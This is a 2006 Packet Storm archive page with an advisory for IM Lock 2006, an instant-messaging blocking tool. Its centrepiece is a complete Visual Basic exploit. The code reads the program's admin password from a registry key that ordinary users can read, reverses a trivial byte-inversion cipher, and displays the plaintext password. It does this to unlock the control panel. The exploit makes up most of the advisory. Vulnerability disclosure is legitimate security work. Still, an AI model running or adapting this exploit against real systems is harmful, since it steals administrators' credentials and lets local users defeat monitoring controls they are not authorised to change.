exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

imlock2006.txt

imlock2006.txt
Posted Mar 8, 2006
Authored by fRoGGz | Site secubox.shadock.net

IM Lock 2006 suffers from a local password encryption weakness. Exploit included.

tags | exploit, local
SHA-256 | 368a7c0f76d3e19857e301f235f6b477e58c7b5b2b374ad5d0f1c87ee29fc876

imlock2006.txt

Change Mirror Download
IM Lock 2006 - Insecure Registry Permission Vulnerability
---------------------------------------------------------

Application: IM Lock 2006
Vendor: www.comvigo.com
Corporation: Comvigo, Inc.
Version: Latest: (2 March 2006) - Home Edition, Enterprise & Professional
Description: IM Lock 2006 discloses passwords to local users.


Background:
===========
Security Auditing & Management software, IM Lock controls and blocks access to
Instant Messaging and peer to peer services that waste time and that can infect
computers with viruses. Blocks all popular services: MSN Messenger, Yahoo Messenger,
ICQ, AIM, Skype, eMule, iTunes, ... We use several algorithms to detect and lock
applications, working portion of IM Lock is virtually invisible to the computer user.


Vulnerability:
==============
Encrypted password is stored in the registry, this key is readable by non-privileged users
on the system, so by decoding password, a malicious user could gain access of config panel.


Exploit:
========

' ############################################################################
' IM Lock 2006 - Local Password Encryption Weakness Exploit by fRoGGz
' Versions: Home Edition, Enterprise & Professional
' Application: IM Lock 2006
' Distributor : Comvigo, Inc.
' Link: http://www.comvigo.com
' Vulnerable Description: IM Lock 2006 discloses passwords to local users.
'
' Discovered & Coded by fRoGGz
' Credits to: SecuBox Labs - shadock.secubox.com
'
' ############################################################################

Private Declare Function RegCloseKey Lib "advapi32.dll" (ByVal hKey As Long) As Long

Private Declare Function RegOpenKey Lib "advapi32.dll" Alias "RegOpenKeyA" _
(ByVal hKey As Long, ByVal lpSubKey As String, phkResult As Long) As Long

Private Declare Function RegQueryValueEx Lib "advapi32.dll" Alias "RegQueryValueExA" _
(ByVal hKey As Long, _
ByVal lpValueName As String, _
ByVal lpReserved As Long, _
lpType As Long, _
lpData As Any, _
lpcbData As Long) As Long

Dim i As Integer
Dim GetCrypt, Decrypt As String

Public Function GrabBDR(hKey As Long, strPath As String, strValue As String) As String
Dim keyhand As Long
Dim lResult As Long
Dim strBuf As String
Dim lDataBufSize As Long
Dim intZeroPos As Integer
Dim sBuffer As String

r = RegOpenKey(hKey, strPath, keyhand)
lResult = RegQueryValueEx(keyhand, strValue, 0&, lValueType, ByVal 0&, lDataBufSize)

If lValueType = 1 Then
strBuf = String(lDataBufSize, " ")
lResult = RegQueryValueEx(keyhand, strValue, 0&, 0&, ByVal strBuf, lDataBufSize)
If lResult = ERROR_SUCCESS Then
intZeroPos = InStr(strBuf, Chr$(0))
If intZeroPos > 0 Then
GrabBDR = Left$(strBuf, intZeroPos - 1)
End If
End If
lResult = RegCloseKey(hKey)
End If
End Function

Private Sub Form_Load()
GetCrypt = GrabBDR(&H80000002, "SOFTWARE\Microsoft\SvcHst\msnvs", "prc")
If GetCrypt <> "" Then
For i = 1 To Len(GetCrypt)
Decrypt = Decrypt & Chr(255 - Asc(Mid(GetCrypt, i, 1)))
Next
MsgBox "ENCRYPT PASSWORD FOUND !" & vbCrLf & "YOUR PASSWORD IS: " & Decrypt, _
vbOKOnly, "Secubox Labs - Recovery"
Else
MsgBox "NO ENCRYPT PASSWORD FOUND !", vbCritical, "IM LOCK INSTALLED ?"
End If
End
End Sub




CREDiTS:
========
fRoGGz - unsecure[at]writeme[dot]com
SecuBox Labs - secubox.shadock.net






























































--
___________________________________________________
Play 100s of games for FREE! http://games.mail.com/
Login or Register to add favorites

File Archive:

April 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Apr 1st
    10 Files
  • 2
    Apr 2nd
    26 Files
  • 3
    Apr 3rd
    40 Files
  • 4
    Apr 4th
    6 Files
  • 5
    Apr 5th
    26 Files
  • 6
    Apr 6th
    0 Files
  • 7
    Apr 7th
    0 Files
  • 8
    Apr 8th
    22 Files
  • 9
    Apr 9th
    14 Files
  • 10
    Apr 10th
    10 Files
  • 11
    Apr 11th
    13 Files
  • 12
    Apr 12th
    14 Files
  • 13
    Apr 13th
    0 Files
  • 14
    Apr 14th
    0 Files
  • 15
    Apr 15th
    30 Files
  • 16
    Apr 16th
    10 Files
  • 17
    Apr 17th
    0 Files
  • 18
    Apr 18th
    0 Files
  • 19
    Apr 19th
    0 Files
  • 20
    Apr 20th
    0 Files
  • 21
    Apr 21st
    0 Files
  • 22
    Apr 22nd
    0 Files
  • 23
    Apr 23rd
    0 Files
  • 24
    Apr 24th
    0 Files
  • 25
    Apr 25th
    0 Files
  • 26
    Apr 26th
    0 Files
  • 27
    Apr 27th
    0 Files
  • 28
    Apr 28th
    0 Files
  • 29
    Apr 29th
    0 Files
  • 30
    Apr 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close